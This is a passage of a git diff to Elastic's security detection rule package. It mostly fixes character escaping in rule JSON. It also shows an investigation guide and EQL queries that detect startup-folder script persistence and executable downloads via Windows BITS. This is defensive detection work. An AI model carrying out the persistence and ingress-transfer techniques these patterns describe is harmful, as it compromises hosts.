!{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Startup Folder Persistence via Unsigned Process - 2fba96c0-ade5-4bce-b92f-a5df2509da3f\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n",
+ "note": "## Triage and analysis\n\n### Investigating Persistent Scripts in the Startup Directory\n\nThe Windows Startup folder is a special folder in Windows. 
Programs added to this folder are executed during account logon, without user interaction, providing an excellent way for attackers to maintain persistence.\n\nThis rule looks for shortcuts created by wscript.exe or cscript.exe, or js/vbs scripts created by any process.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous 
entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Startup Folder Persistence via Unsigned Process - 2fba96c0-ade5-4bce-b92f-a5df2509da3f\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n",
 "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and user.domain != \"NT AUTHORITY\" and\n\n /* detect shortcuts created by wscript.exe or cscript.exe */\n (file.path : \"C:\\\\*\\\\Programs\\\\Startup\\\\*.lnk\" and\n process.name : (\"wscript.exe\", \"cscript.exe\")) or\n\n /* detect vbs or js files created by any process */\n file.path : (\"C:\\\\*\\\\Programs\\\\Startup\\\\*.vbs\",\n \"C:\\\\*\\\\Programs\\\\Startup\\\\*.vbe\",\n \"C:\\\\*\\\\Programs\\\\Startup\\\\*.wsh\",\n \"C:\\\\*\\\\Programs\\\\Startup\\\\*.wsf\",\n \"C:\\\\*\\\\Programs\\\\Startup\\\\*.js\")\n",
 "related_integrations": [
 { 
@@ -55,7 +55,7 @@
 ],
 "risk_score": 47,
 "rule_id": "f7c4dc5a-a58d-491d-9f14-9b66507121c0",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -68,7 +68,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/f81ee52c-297e-46d9-9205-07e66931df26_102.json b/packages/security_detection_engine/kibana/security_rule/f81ee52c-297e-46d9-9205-07e66931df26_102.json
index 69a03f6ebc6..753233e8c07 100644
--- a/packages/security_detection_engine/kibana/security_rule/f81ee52c-297e-46d9-9205-07e66931df26_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/f81ee52c-297e-46d9-9205-07e66931df26_102.json 
@@ -65,7 +65,7 @@
 ],
 "risk_score": 73,
 "rule_id": "f81ee52c-297e-46d9-9205-07e66931df26",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Elastic",
@@ -77,7 +77,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/f81ee52c-297e-46d9-9205-07e66931df26_103.json b/packages/security_detection_engine/kibana/security_rule/f81ee52c-297e-46d9-9205-07e66931df26_103.json
index fe6eb541e54..3ac7c53e25e 100644
--- a/packages/security_detection_engine/kibana/security_rule/f81ee52c-297e-46d9-9205-07e66931df26_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/f81ee52c-297e-46d9-9205-07e66931df26_103.json 
@@ -65,7 +65,7 @@ ], "risk_score": 73, "rule_id": "f81ee52c-297e-46d9-9205-07e66931df26", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/f81ee52c-297e-46d9-9205-07e66931df26_104.json b/packages/security_detection_engine/kibana/security_rule/f81ee52c-297e-46d9-9205-07e66931df26_104.json index c1c90bbeae0..1c21e53ad3c 100644 --- a/packages/security_detection_engine/kibana/security_rule/f81ee52c-297e-46d9-9205-07e66931df26_104.json +++ b/packages/security_detection_engine/kibana/security_rule/f81ee52c-297e-46d9-9205-07e66931df26_104.json 
@@ -65,7 +65,7 @@ ], "risk_score": 73, "rule_id": "f81ee52c-297e-46d9-9205-07e66931df26", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -77,7 +77,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/f81ee52c-297e-46d9-9205-07e66931df26_105.json b/packages/security_detection_engine/kibana/security_rule/f81ee52c-297e-46d9-9205-07e66931df26_105.json index 3c279be1b5d..a1c1abeac67 100644 --- a/packages/security_detection_engine/kibana/security_rule/f81ee52c-297e-46d9-9205-07e66931df26_105.json +++ b/packages/security_detection_engine/kibana/security_rule/f81ee52c-297e-46d9-9205-07e66931df26_105.json 
@@ -65,7 +65,7 @@ ], "risk_score": 73, "rule_id": "f81ee52c-297e-46d9-9205-07e66931df26", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -93,7 +93,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/f81ee52c-297e-46d9-9205-07e66931df26_106.json b/packages/security_detection_engine/kibana/security_rule/f81ee52c-297e-46d9-9205-07e66931df26_106.json index e73eb4305d3..bcb0bf24b76 100644 --- a/packages/security_detection_engine/kibana/security_rule/f81ee52c-297e-46d9-9205-07e66931df26_106.json +++ b/packages/security_detection_engine/kibana/security_rule/f81ee52c-297e-46d9-9205-07e66931df26_106.json 
@@ -64,7 +64,7 @@ ], "risk_score": 73, "rule_id": "f81ee52c-297e-46d9-9205-07e66931df26", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -77,7 +77,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -92,7 +92,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/f85ce03f-d8a8-4c83-acdc-5c8cd0592be7_102.json b/packages/security_detection_engine/kibana/security_rule/f85ce03f-d8a8-4c83-acdc-5c8cd0592be7_102.json index ce6df191804..4ab5668a123 100644 --- a/packages/security_detection_engine/kibana/security_rule/f85ce03f-d8a8-4c83-acdc-5c8cd0592be7_102.json +++ b/packages/security_detection_engine/kibana/security_rule/f85ce03f-d8a8-4c83-acdc-5c8cd0592be7_102.json 
@@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/f85ce03f-d8a8-4c83-acdc-5c8cd0592be7_103.json b/packages/security_detection_engine/kibana/security_rule/f85ce03f-d8a8-4c83-acdc-5c8cd0592be7_103.json index 0be498041ce..6a4016116d0 100644 --- a/packages/security_detection_engine/kibana/security_rule/f85ce03f-d8a8-4c83-acdc-5c8cd0592be7_103.json +++ b/packages/security_detection_engine/kibana/security_rule/f85ce03f-d8a8-4c83-acdc-5c8cd0592be7_103.json @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/f85ce03f-d8a8-4c83-acdc-5c8cd0592be7_104.json b/packages/security_detection_engine/kibana/security_rule/f85ce03f-d8a8-4c83-acdc-5c8cd0592be7_104.json index 37258546dd4..b9c134c050a 100644 --- a/packages/security_detection_engine/kibana/security_rule/f85ce03f-d8a8-4c83-acdc-5c8cd0592be7_104.json +++ b/packages/security_detection_engine/kibana/security_rule/f85ce03f-d8a8-4c83-acdc-5c8cd0592be7_104.json @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/f85ce03f-d8a8-4c83-acdc-5c8cd0592be7_105.json b/packages/security_detection_engine/kibana/security_rule/f85ce03f-d8a8-4c83-acdc-5c8cd0592be7_105.json index 607e1bb8d44..7991a7b4f00 100644 --- a/packages/security_detection_engine/kibana/security_rule/f85ce03f-d8a8-4c83-acdc-5c8cd0592be7_105.json +++ b/packages/security_detection_engine/kibana/security_rule/f85ce03f-d8a8-4c83-acdc-5c8cd0592be7_105.json 
@@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/f874315d-5188-4b4a-8521-d1c73093a7e4_104.json b/packages/security_detection_engine/kibana/security_rule/f874315d-5188-4b4a-8521-d1c73093a7e4_104.json index 63862545e50..f14cc1da2f0 100644 --- a/packages/security_detection_engine/kibana/security_rule/f874315d-5188-4b4a-8521-d1c73093a7e4_104.json +++ b/packages/security_detection_engine/kibana/security_rule/f874315d-5188-4b4a-8521-d1c73093a7e4_104.json @@ -54,7 +54,7 @@ ], "risk_score": 73, "rule_id": "f874315d-5188-4b4a-8521-d1c73093a7e4", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/f874315d-5188-4b4a-8521-d1c73093a7e4_105.json b/packages/security_detection_engine/kibana/security_rule/f874315d-5188-4b4a-8521-d1c73093a7e4_105.json index 013b80876a0..68ea97782c2 100644 --- a/packages/security_detection_engine/kibana/security_rule/f874315d-5188-4b4a-8521-d1c73093a7e4_105.json 
+++ b/packages/security_detection_engine/kibana/security_rule/f874315d-5188-4b4a-8521-d1c73093a7e4_105.json @@ -54,7 +54,7 @@ ], "risk_score": 73, "rule_id": "f874315d-5188-4b4a-8521-d1c73093a7e4", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/f874315d-5188-4b4a-8521-d1c73093a7e4_106.json b/packages/security_detection_engine/kibana/security_rule/f874315d-5188-4b4a-8521-d1c73093a7e4_106.json index 7598e264e74..34878eaf14e 100644 --- a/packages/security_detection_engine/kibana/security_rule/f874315d-5188-4b4a-8521-d1c73093a7e4_106.json +++ b/packages/security_detection_engine/kibana/security_rule/f874315d-5188-4b4a-8521-d1c73093a7e4_106.json 
@@ -54,7 +54,7 @@ ], "risk_score": 73, "rule_id": "f874315d-5188-4b4a-8521-d1c73093a7e4", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/f874315d-5188-4b4a-8521-d1c73093a7e4_107.json b/packages/security_detection_engine/kibana/security_rule/f874315d-5188-4b4a-8521-d1c73093a7e4_107.json index 73c6f8f86c2..58b92c66918 100644 --- a/packages/security_detection_engine/kibana/security_rule/f874315d-5188-4b4a-8521-d1c73093a7e4_107.json +++ b/packages/security_detection_engine/kibana/security_rule/f874315d-5188-4b4a-8521-d1c73093a7e4_107.json 
@@ -54,7 +54,7 @@ ], "risk_score": 73, "rule_id": "f874315d-5188-4b4a-8521-d1c73093a7e4", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/f874315d-5188-4b4a-8521-d1c73093a7e4_108.json b/packages/security_detection_engine/kibana/security_rule/f874315d-5188-4b4a-8521-d1c73093a7e4_108.json index a73c5153bda..e82ecc578ee 100644 --- a/packages/security_detection_engine/kibana/security_rule/f874315d-5188-4b4a-8521-d1c73093a7e4_108.json +++ b/packages/security_detection_engine/kibana/security_rule/f874315d-5188-4b4a-8521-d1c73093a7e4_108.json 
@@ -54,7 +54,7 @@ ], "risk_score": 73, "rule_id": "f874315d-5188-4b4a-8521-d1c73093a7e4", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/f9590f47-6bd5-4a49-bd49-a2f886476fb9_101.json b/packages/security_detection_engine/kibana/security_rule/f9590f47-6bd5-4a49-bd49-a2f886476fb9_101.json index 1fe5a462a5c..ab23d7200db 100644 --- a/packages/security_detection_engine/kibana/security_rule/f9590f47-6bd5-4a49-bd49-a2f886476fb9_101.json +++ b/packages/security_detection_engine/kibana/security_rule/f9590f47-6bd5-4a49-bd49-a2f886476fb9_101.json @@ -29,7 +29,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", 
diff --git a/packages/security_detection_engine/kibana/security_rule/f9590f47-6bd5-4a49-bd49-a2f886476fb9_102.json b/packages/security_detection_engine/kibana/security_rule/f9590f47-6bd5-4a49-bd49-a2f886476fb9_102.json index 9e4d5b264a7..be2c873b10d 100644 --- a/packages/security_detection_engine/kibana/security_rule/f9590f47-6bd5-4a49-bd49-a2f886476fb9_102.json +++ b/packages/security_detection_engine/kibana/security_rule/f9590f47-6bd5-4a49-bd49-a2f886476fb9_102.json @@ -29,7 +29,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/f9590f47-6bd5-4a49-bd49-a2f886476fb9_103.json b/packages/security_detection_engine/kibana/security_rule/f9590f47-6bd5-4a49-bd49-a2f886476fb9_103.json index 9bda6139a73..9e50bff82e6 100644 --- a/packages/security_detection_engine/kibana/security_rule/f9590f47-6bd5-4a49-bd49-a2f886476fb9_103.json +++ b/packages/security_detection_engine/kibana/security_rule/f9590f47-6bd5-4a49-bd49-a2f886476fb9_103.json @@ -28,7 +28,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/f9590f47-6bd5-4a49-bd49-a2f886476fb9_104.json b/packages/security_detection_engine/kibana/security_rule/f9590f47-6bd5-4a49-bd49-a2f886476fb9_104.json index e8165f8cfb7..0ccf4b0a0c0 100644 --- a/packages/security_detection_engine/kibana/security_rule/f9590f47-6bd5-4a49-bd49-a2f886476fb9_104.json +++ b/packages/security_detection_engine/kibana/security_rule/f9590f47-6bd5-4a49-bd49-a2f886476fb9_104.json @@ -38,7 +38,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", 
diff --git a/packages/security_detection_engine/kibana/security_rule/f95972d3-c23b-463b-89a8-796b3f369b49_2.json b/packages/security_detection_engine/kibana/security_rule/f95972d3-c23b-463b-89a8-796b3f369b49_2.json index d864d3074fe..535bc38c33b 100644 --- a/packages/security_detection_engine/kibana/security_rule/f95972d3-c23b-463b-89a8-796b3f369b49_2.json +++ b/packages/security_detection_engine/kibana/security_rule/f95972d3-c23b-463b-89a8-796b3f369b49_2.json 
@@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Ingress Transfer via Windows BITS", - "query": "file where host.os.type == \"windows\" and event.action == \"rename\" and\n\nprocess.name : \"svchost.exe\" and file.Ext.original.name : \"BIT*.tmp\" and \n (file.extension :(\"exe\", \"zip\", \"rar\", \"bat\", \"dll\", \"ps1\", \"vbs\", \"wsh\", \"js\", \"vbe\", \"pif\", \"scr\", \"cmd\", \"cpl\") or file.Ext.header_bytes : \"4d5a*\") and \n \n /* noisy paths, for hunting purposes you can use the same query without the following exclusions */\n not file.path : (\"?:\\\\Program Files\\\\*\", \"?:\\\\Program Files (x86)\\\\*\", \"?:\\\\Windows\\\\*\", \"?:\\\\ProgramData\\\\*\\\\*\") and \n \n /* lot of third party SW use BITS to download executables with a long file name */\n not length(file.name) \u003e 30\n", + "query": "file where host.os.type == \"windows\" and event.action == \"rename\" and\n\nprocess.name : \"svchost.exe\" and file.Ext.original.name : \"BIT*.tmp\" and \n (file.extension :(\"exe\", \"zip\", \"rar\", \"bat\", \"dll\", \"ps1\", \"vbs\", \"wsh\", \"js\", \"vbe\", \"pif\", \"scr\", \"cmd\", \"cpl\") or file.Ext.header_bytes : \"4d5a*\") and \n \n /* noisy paths, for hunting purposes you can use the same query without the following exclusions */\n not file.path : (\"?:\\\\Program Files\\\\*\", \"?:\\\\Program Files (x86)\\\\*\", \"?:\\\\Windows\\\\*\", \"?:\\\\ProgramData\\\\*\\\\*\") and \n \n /* lot of third party SW use BITS to download executables with a long file name */\n not length(file.name) > 30\n", "references": [ "https://attack.mitre.org/techniques/T1197/" ], @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", @@ -91,7 +91,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", 
